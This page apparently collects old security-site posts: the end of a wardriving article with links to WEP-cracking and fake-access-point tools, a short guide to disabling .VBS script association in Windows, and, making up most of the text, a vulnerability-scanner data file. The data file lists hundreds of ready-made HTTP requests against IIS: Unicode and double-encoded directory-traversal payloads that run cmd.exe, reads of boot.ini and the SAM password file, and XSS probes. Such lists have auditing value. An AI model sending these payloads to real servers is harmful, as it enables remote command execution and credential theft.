http://www.blackbeltjones.com/warchalking/warchalking0_9.pdf – WarChalking Symbols

http://wepcrack.sourceforge.net – WEPCrack – Linux

http://www.blackalchemy.to/Projects/fakeap/fake-ap.html – Fake AP – Linux

http://prismstumbler.sourceforge.net/ – PrismStumbler – Linux

http://www.bastard.net/~kos/wifi/ – SSID Sniff – Linux

http://www.techm.com/font2.html – Hobo Symbol Type Font

If you have any questions, suggestions, ideas, comments regarding this article; feel free to contact me at admin@ebcvg.com, or at danny@any-mail.co.uk.

Copyright © Sep 2002 Danny “Dr.T”. All rights reserved.
http://www.ebcvg.com / http://danny.at.box.sk

Windows Scripting Host – disabling VBS association

March 3, 2007

Windows Scripting Host – disabling .VBS association

Windows Scripting Host (WSH) is a part of some of Microsoft’s 32 bits operating systems, or is installed when certain Microsoft programs are installed. WSH may be used to run Visual Basic Scripts (VBS) to automate some actions which are to be performed frequently, and could thus be a useful tool. However – WSH are also used by some virus authors to perform malicious actions on computers.

For example as the infamous LoveLetter virus utilizes WSH. As if often the situation – the security aware person has to choose between enhanced functionality versus higher security. With the havoc caused by LoveLetter in mind, security-aware organizations may want to disable the association between VBS and WSH on the computers. Then Visual Basic Scripts will not run automatically when clicked.

Below are instructions about how to disable the association between .VBS and Windows Scripting Host for the operating system that you use.

WSH is installed if:

-You install Internet Explorer version 5
-You download WSH from a Microsoft’s site

How to disable the .VBS file association to WSH:

1. Log in as an administrator
2. On the Desktop, or in Windows Explorer, right-click the My Computer icon.
3. Select the menu choice Open.
4. In the My Computer window, open the View menu and select Options….
5. Open the File Types tab.
6. Scroll and look for VBScript Script File in the list of different file types (alphabetically ordered) like in the image below.
7. Click the Remove button.
8. Click Yes if you are asked for confirmation.

NOTE: If this file type is not in the list, .VBS files are not associated with WSH, and your computer is safe.

References:
WindowSecurity.com

Vulnerability Data File For IIS Vulnerability Scanner

March 3, 2007

by OkIDaN

This is the vulnerability data file for IIS Vulnerability Scanner. You can add/remove checks
from this file but do not modify this section in any way. This file contains more than 1500
checks and was compiled from vulnerability lists of programs like xscan, nikto.pl and urlchk.
##################

GET***/%NETHOOD%/***200
GET***/***200
GET***/.”./.”./winnt/win.ini%20.php3***200
GET***/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini***200
GET***/…………………/config.sys***200
GET***/………………../boot.ini***200
GET***/………………./boot.ini***200
GET***/………………/boot.ini***200
GET***/………………/config.sys***200
GET***/……………../boot.ini***200
GET***/……………./boot.ini***200
GET***/……………/boot.ini***200
GET***/…………../boot.ini***200
GET***/…………./boot.ini***200
GET***/…………/boot.ini***200
GET***/………../boot.ini***200
GET***/………./autoexec.bat***200
GET***/………./boot.ini***200
GET***/………/boot.ini***200
GET***/……../boot.ini***200
GET***/……./boot.ini***200
GET***/……/ all***200
GET***/……/***200
GET***/……/autoexec.bat***200
GET***/……/boot.ini***200
GET***/……/config.sys***200
GET***/…../boot.ini***200
GET***/…./Windows/Admin.pwl***200
GET***/…./boot.ini***200
GET***/…./config.sys***200
GET***/…/boot.ini***200
GET***/../../../../ all***200
GET***/../../../../../../../../../boot.ini***200
GET***/../../../../../../../../boot.ini***200
GET***/../../../../../../../boot.ini***200
GET***/../../../../../../Scandisk.log***200
GET***/../../../../../../boot.ini***200
GET***/../../../../../boot.ini***200
GET***/../../../../../winnt/repair/sam._***200
GET***/../../../../boot.ini***200
GET***/../../../../config.sys***200
GET***/../../../../winnt/repair/sam._***200
GET***/../../../autoexec.bat***200
GET***/../../../boot.ini***200
GET***/../../../scandisk.log***200
GET***/../../boot.ini***200
GET***/../../windows/user.dat***200
GET***/../../winnt/win.ini***200
GET***/../boot.ini***200
GET***/..\..\..\..\..\..\autoexec.bat***200
GET***/..\..\..\..\..\autoexec.bat***200
GET***/..\..\..\..\autoexec.bat***200
GET***/..\..\..\autoexec.bat***200
GET***/..\..\..\winnt\repair\sam._***200
GET***/..\..\autoexec.bat***200
GET***/..\\..\\..\\..\\..\\..\\..\\boot.ini***200
GET***/..\\..\\..\\..\\..\\..\autoexec.bat***200
GET***/..\\..\\..\winnt\repair\sam._***200
GET***/.html/…………*/config.sys***200
GET***/.html/…………./config.sys***200
GET***/.html/…………/autoexec.bat***200
GET***/.jsp/WEB-INF/classes/Env.java***200
GET***/.nsf/../winnt/win.ini***200
GET***/<script>alert(‘Vulnerable’)</script>.shtm***200
GET***/<script>alert(‘Vulnerable’)</script>.stm***200
GET***/?\><script>alert(‘Vulnerable’);</script>***200
GET***/ASPSamp/AdvWorks/equipment/catalog_type.asp***200
GET***/Admin_files/order.log***200
GET***/AdvWorks/equipment/catalog_type.asp***200
GET***/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0***200
GET***/Carello/Admin/Admin.htm***200
GET***/IISSAMPLES/ExAir/Search/search.asp***200
GET***/ISSamples/SQLQHit.asp***200
GET***/ISSamples/sqlqhit.asp***200
GET***/JUNK(10)***200
GET***/JUNK(10)abcd.html***200
GET***/JUNK(5).htw***200
GET***/LNSS_test_.htr***200
GET***/MSADC/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/MSADC/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/MSADC/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/MSADC/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/NULL.printer***200
GET***/OpenFile.aspx?file=../../../../../../../../../../boot.ini***200
GET***/PBServer/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/PBServer/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/Proxy/LoginResponse***200
GET***/Rpc/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/Rpc/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/SQLQHit.asp***200
GET***/SiteServer/Admin/commerce/foundation/DSN.asp***200
GET***/SiteServer/Admin/commerce/foundation/domain.asp***200
GET***/SiteServer/Admin/commerce/foundation/driver.asp***200
GET***/SiteServer/Admin/knowledge/dsmgr/default.asp***200
GET***/SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp***200
GET***/SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp***200
GET***/SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp***200
GET***/SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp***200
GET***/SiteServer/Admin/knowledge/persmbr/VsTmPr.asp***200
GET***/SiteServer/Admin/knowledge/persmbr/vs.asp***200
GET***/SiteServer/Knowledge/Default.asp?ctr=\><script>alert(‘Vulnerable’)</script>***200
GET***/SiteServer/Publishing/ViewCode.asp***200
GET***/SiteServer/Publishing/viewcode.asp***200
GET***/SiteServer/admin/***403
GET***/SiteServer/admin/findvserver.asp***200
GET***/Sites/Knowledge/Membership/Inspired/ViewCode.asp***200
GET***/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp***200
GET***/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp***200
GET***/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp***200
GET***/Sites/Samples/Knowledge/Push/ViewCode.asp***200
GET***/Sites/Samples/Knowledge/Search/ViewCode.asp***200
GET***/WS_FTP.LOG***200
GET***/WebAdmin.dll?View=Logon***200
GET***/WebShop/logs/cc.txt***200
GET***/WebShop/logs/ck.log***200
GET***/WebShop/templates/cc.txt***200
GET***/\../boot.ini***200
GET***/\../config.sys***200
GET***/_AuthChangeUrl***200
GET***/_AuthChangeUrl?***200
GET***/__vti_inf.html***200
GET***/_cti_pvt/***200
GET***/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%c0%9v../..%c0%9v../..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c0%qf../..%c0%qf../..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%8s../..%c1%8s../..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%9c..%c1%9c..%c1%9c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%9f../..%c1%9f../..%c1%9f../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%c1%af../..%c1%af../..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%f0%80%80%af../..%f0%80%80%af../..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%f8%80%80%80%af../..%f8%80%80%80%af../..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%u0025%u005c..%u0025%u005cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%u0025%u005c../..%u0025%u005c../..%u0025%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%u00255c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%u00255c../..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%u00255c../..%u00255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%u002e..%u002e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%u002f..%u002fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%u002f../..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%u002f../..%u002f../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_mem_bin/..%u005c../..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..%u005c../..%u005c../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir%20c:\***200
GET***/_mem_bin/..\..\..\../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/.._../winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/auoconfig.asp***200
GET***/_mem_bin/check.bat/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%%35%63../..%%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%%35c../..%%35cwinnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%25%35%63../..%25%35%63winnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%255c../..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%c0%2f..%c0%2f..%c0%2fwinnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%c1%1c..%c1%1c..%c1%1cwinnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%c1%9c..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%u00255c../..%u00255cwinnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%u002f../..%u002fwinnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/check.bat/..%u005c../..%u005cwinnt/system32/cmd.exe?/c+dir***200
GET***/_mem_bin/formslogin.asp?\><script>alert(‘Vulnerable’)</script>***200
GET***/_mem_bin/remind.asp***200
GET***/_private***200
GET***/_private/***200
GET***/_private/_vti_cnf/***200
GET***/_private/form_results.htm***200
GET***/_private/form_results.html***200
GET***/_private/form_results.txt***200
GET***/_private/orders.htm***200
GET***/_private/orders.txt***200
GET***/_private/register.htm***200
GET***/_private/register.txt***200
GET***/_private/registrations.htm***200
GET***/_private/registrations.txt***200
GET***/_private/shopping_cart.mdb***200
GET***/_vti_adm/admin.dll***200
GET***/_vti_bin***200
GET***/_vti_bin/***200
GET***/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/.%u002e/.%u002e/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/.%u002e/.%u002e/winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_bin/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%%35c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%25%35%63../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%255c../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c0%2f..%c0%2f..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c0%2f../..%c0%2f../..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c0%2f../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir***200
GET***/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\***200
GET***/_vti_bin/..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir***200
GET***/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:***200
GET***/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe?/c+dir***200
